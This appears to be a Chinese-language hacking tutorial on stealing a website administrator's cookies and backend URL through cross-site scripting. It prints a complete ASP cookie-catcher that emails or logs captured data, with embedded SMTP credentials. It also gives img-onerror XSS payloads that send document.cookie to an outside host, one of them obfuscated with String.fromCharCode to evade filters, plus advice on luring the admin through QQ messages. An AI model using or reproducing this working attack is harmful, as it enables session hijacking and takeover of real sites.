XSS获取管理后台实战

一直想写可没空写，既然Trojan 整理出来我就发下。其实也就是个类似QQ马发信的代码.request接受数据,然后创建文件流

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72

dizhi = request ( "dizhi" ) SaveFile = "pass.txt"  '保存获取数据的TXT IfSendMail = true  '是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件 YourSendMail = "czsteel@163.com"  '修改成你自己的邮箱地址。 YourSendMailUser = "cal"  '邮箱登陆用户名 YourSendMailPass = "a"  '邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们 测试, 24小时后我修改密码... YourSendMailServer = "smtp.163.com"  '邮件服务器 '注意哦，你自己的邮箱地址必须要开通pop/smtp功能。否则不能正常发信。 '另外就是你的空间必须支持Jmail. YourMailTitle = "a"  '邮件标题 YourRecvMail = "a"  '收取截获数据的邮箱，建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息 sub sendmail (content ) On  error  resume  next dim JMail Set JMail  =  Server. CreateObject ( "JMail.Message" ) JMail. Logging  =  True JMail. Charset  =  "gb2312" JMail. ContentType  =  "textml" JMail. From  = YourSendMail JMail. FromName  =  "" &amp ;YourSendMailUser JMail. MailServerUserName  = YourSendMailUser JMail. MailServerPassword  = YourSendMailPass JMail. Priority  =  1 JMail. AddRecipient YourRecvMail JMail. Subject  = YourMailTitle JMail. Body  = content JMail. Send ( "smtp.163.com" ) Set JMail  =  nothing If err  then Response. write  "发送失败!请检查配置!并确认你的服务器是否支持Jmail!" ' &GetPostStr else Response. write  "发送成功!" &amp ;GetPostStr '&GetPostStr &url end  if end  sub GetPostStr = Request. QueryString ( "cookie" ) &amp ; "|" &amp ;dizhi if GetPostStr = ""  then Response. write  "None!" end  if if ifsendmail  then StrTemp = Replace (GetPostStr, "=", ":" ) StrTemp = Replace (StrTemp, "&", " " ) StrTemp =StrTemp &amp ; "|" &amp ; Request. ServerVariables ( "Remote_Addr" ) sendmail (StrTemp ) 'ip = Request.ServerVariables("Remote_Addr") 'WriteTxt(Request.ServerVariables("Remote_Addr"),StrTemp) else set F = server. CreateObject ( "scripting.filesystemobject" ) set I =F. OpenTextFile ( server. mappath (SaveFile ), 8, True, 0 ) TempStr =Split (GetPostStr, "&" ) for TempI = 0  To  Ubound (TempStr ) I. WriteLine ( Replace (TempStr (TempI ), "=", ":" ) ) next I. WriteLine ( now ( ) ) I. WriteLine ( "--------------------------------" ) I. close Set F = nothing end  if Function WriteTxt (ip,Str ) set F = server. CreateObject ( "scripting.filesystemobject" ) set I =F. OpenTextFile ( server. mappath ( "SendIp.txt" ), 8, True, 0 ) I. WriteLine ( now ( ) ) I. WriteLine (ip ) I. WriteLine (Str ) I. WriteLine ( "--------------------------------" ) I. close Set F = nothing end  Function %&gt ;

这样就实现了创建txt的功能.下面构造下跨站.<script>被过滤了.别的没过滤貌似.想获取后台就是知道他当前的document.url 就可以了.直接作为参数穿走:

<img src="x"/**/οnerrοr="eval(img = new Image(); img.src = " http://www.szbuffer.com/
url.asp?cookie="+document.cookie+"&dizhi="+document.URL;img.width=0;img.height=0)"></img>

简单解释下.一个Img标签说明是图片地址是x出错了执行后面的话,创建了一个img的对象,然后调用Img的src属性等.主要传参.我把代码发到了留言板发现不执行.估计还给过滤了.那就把代码转换成asci码,利用String.fromCharCode在解析回来:

<img src="x"/**/οnerrοr="eval(String.fromCharCode(105,109,103,32,61,32,110,
101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,
34,104,116,116,112,58,47,47,119,119,119,46,120,120,98,105,110,103,46,99,111,
109,47,102,117,99,107,121,111,117,46,97,115,112,63,99,111,111,107,105,101,61,
34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,38,100,
105,122,104,105,61,34,43,100,111,99,117,109,101,110,116,46,85,82,76,59,105,
109,103,46,119,105,100,116,104,61,48,59,105,109,103,46,104,101,105,103,104,
116,61,48))"></img>

这样留言后加上管理员QQ,说管理员你们服务太差劲了,我不想多说了,去看我给你们的留言把.然后等着上钩把.这个方式试用在可以留言,有跨站,不知道后台地址的情况下.